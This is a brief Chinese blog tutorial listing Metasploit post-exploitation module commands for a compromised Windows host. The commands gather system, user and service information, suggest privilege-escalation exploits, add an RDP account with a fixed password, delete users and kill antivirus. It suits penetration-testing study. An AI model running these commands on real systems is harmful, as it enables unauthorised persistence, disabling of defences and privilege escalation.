评论

收藏

[其他] Metasploit -- 后***模块(POST)

网络安全 网络安全 发布于:2021-07-02 14:42 | 阅读数:382 | 评论:0

给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评

作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

DSC0000.png

2、检测是否是虚拟主机

run post/windows/gather/checkvm

DSC0001.png

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

DSC0002.png

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

DSC0003.png

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

DSC0004.png

6、收集系统环境信息

run post/multi/gather/env

DSC0005.png

7、查看开启的服务

run post/windows/gather/enum_services

DSC0006.png

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

DSC0007.png

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav

 

DSC0008.jpeg


  
关注下面的标签,发现更多相似文章